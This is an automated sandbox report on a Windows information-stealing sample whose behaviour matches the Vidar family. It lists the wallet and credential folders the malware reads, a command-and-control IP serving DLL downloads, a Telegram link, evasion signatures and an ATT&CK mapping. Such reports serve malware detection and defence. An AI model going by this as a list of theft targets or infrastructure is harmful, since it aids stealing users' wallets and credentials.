                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: Yara matchFile source: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4076, type: MEMORYSTR

                        Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CCA0C40 sqlite3_bind_zeroblob,1_2_6CCA0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CCA0D60 sqlite3_bind_parameter_name,1_2_6CCA0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CBC8EA0 sqlite3_clear_bindings,1_2_6CBC8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CCA0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,1_2_6CCA0B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CBC6410 bind,WSAGetLastError,1_2_6CBC6410

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 54 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 141 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

Behavior Graph (ID: 1429063; Sample: SecuriteInfo.com.Win32.Coin...; Startdate: 20/04/2024; Architecture: WINDOWS; Score: 100)
DNS/IP: windowsupdatebg.s.llnwi.net; steamcommunity.com; 2 other IPs or domains
Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Multi AV Scanner detection for submitted file; 10 other signatures
Process: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe (started)
  Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Process: MSBuild.exe (started by SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe)
  DNS/IP: 37.27.87.155, 443, 49732, 49733 UNINETAZ Iran (ISLAMIC Republic Of); steamcommunity.com 23.76.43.59, 443, 49731 AMXArgentinaSAAR United States
  Dropped: C:\Users\user\AppData\...\vcruntime140[1].dll, PE32; C:\Users\user\AppData\...\softokn3[1].dll, PE32; C:\Users\user\AppData\Local\...\nss3[1].dll, PE32; 10 other files (none is malicious)
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 5 other signatures

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | 24% | ReversingLabs | Win32.Trojan.CoinminerX |
SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | 26% | Virustotal | | Browse
SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
C:\ProgramData\freebl3.dll | 0% | Virustotal | | Browse
C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
C:\ProgramData\mozglue.dll | 0% | Virustotal | | Browse
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
C:\ProgramData\msvcp140.dll | 0% | Virustotal | | Browse
C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
C:\ProgramData\nss3.dll | 0% | Virustotal | | Browse
C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
C:\ProgramData\softokn3.dll | 0% | Virustotal | | Browse
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
C:\ProgramData\vcruntime140.dll | 0% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll | 1% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll | 0% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll | 0% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll | 0% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll | 0% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll | 0% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll | 0% | Virustotal | | Browse

                        No Antivirus matches

Source | Detection | Scanner | Label | Link
fp2e7a.wpc.phicdn.net | 0% | Virustotal | | Browse
windowsupdatebg.s.llnwi.net | 0% | Virustotal | | Browse

                        SourceDetectionScannerLabelLink
                        https://mozilla.org0/0%URL Reputationsafe
                        https://37.27.87.155/sqln.dll3%VirustotalBrowse
                        https://37.27.87.155/sqln.dll#3%VirustotalBrowse
                        https://37.27.87.155/4%VirustotalBrowse
                        https://37.27.87.155/18%VirustotalBrowse

Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.76.43.59 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.211.108 | true | false | | unknown
windowsupdatebg.s.llnwi.net | 69.164.42.0 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://37.27.87.155/sqln.dll | false | | unknown
https://37.27.87.155/softokn3.dll | false | | unknown
https://37.27.87.155/nss3.dll | false | | unknown
https://37.27.87.155/vcruntime140.dll | false | | unknown
https://37.27.87.155/msvcp140.dll | false | | unknown
https://37.27.87.155/ | false | | unknown
https://37.27.87.155/freebl3.dll | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                              high
                                                                                                              https://www.ecosia.org/newtab/DBKKKEHD.1.drfalse
                                                                                                                high
                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brAKKFHDAKECFHIDHJDAAAEBKJEC.1.drfalse
                                                                                                                  high
                                                                                                                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199673019888[1].htm.1.drfalse
                                                                                                                    high
                                                                                                                    https://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                      high
                                                                                                                      https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                        high
                                                                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                          high
                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                            high
                                                                                                                            https://37.27.87.155AKKFHMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                              low
                                                                                                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                high
                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesHIDAFHDH.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://store.steampowered.com/about/76561199673019888[1].htm.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://37.27.87.155/9MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://steamcommunity.com/my/wishlist/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://t.me/irfailAtSecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFAKKFHDAKECFHIDHJDAAAEBKJEC.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://37.27.87.155/1;WMSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://github.com/mgravell/protobuf-netJSecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://37.27.87.155/1MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                                                                                                    https://help.steampowered.com/en/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/market/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://store.steampowered.com/news/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://37.27.87.155/nd-point:MSBuild.exe, 00000001.00000002.2135698617.0000000000E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=DBKKKEHD.1.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://store.steampowered.com/subscriber_agreement/MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgMSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp, HIDAFHDH.1.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://steamcommunity.com/discussions/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://store.steampowered.com/stats/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://37.27.87.155/27.87.155/nss3.dllMSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://github.com/mgravell/protobuf-netiSecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://store.steampowered.com/steam_refunds/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://steamcommunity.com/GMSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://stackoverflow.com/q/11564914/23354;SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallHIDAFHDH.1.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchDBKKKEHD.1.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&aMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://steamcommunity.com/workshop/MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://t.me/irfailSecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://37.27.87.155/BMSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://store.steampowered.com/legal/MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://www.sqlite.org/copyright.html.MSBuild.exe, 00000001.00000002.2149153992.000000001997D000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://37.27.87.155/DMSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvMSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                                              high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | DBKKKEHD.1.dr | false | high
https://37.27.87.155/freebl3.dll( | MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://37.27.87.155/r | MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://37.27.87.155/ets | MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://github.com/mgravell/protobuf-net | SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp | false | high
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 37.27.87.155 | unknown | Iran (ISLAMIC Republic Of) | 39232 | UNINETAZ | false |
| 23.76.43.59 | steamcommunity.com | United States | 19037 | AMXArgentinaSAAR | false |
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1429063
Start date and time: 2024-04-20 14:27:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/26@1/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 286
• Number of non-executed functions: 68
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.85.23.86, 69.164.42.0, 192.229.211.108, 20.242.39.171
• Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, PID 6308 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
|---|---|---|
| 14:28:13 | API Interceptor | 1x Sleep call for process: MSBuild.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 37.27.87.155 | file.exe | malicious | Vidar | |
| | qk9TaBBxh8.exe | malicious | LummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader | |
| | file.exe | malicious | Vidar | |
| | SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer | |
| | file.exe | malicious | Vidar | |
| 23.76.43.59 | file.exe | malicious | LummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRAT | steamcommunity.com/PhpMyAdmin/ |
                                                                                                                                                                                                                                  • 23.210.138.105
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.210.138.105
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  UNINETAZfile.exeGet hashmaliciousVidarBrowse
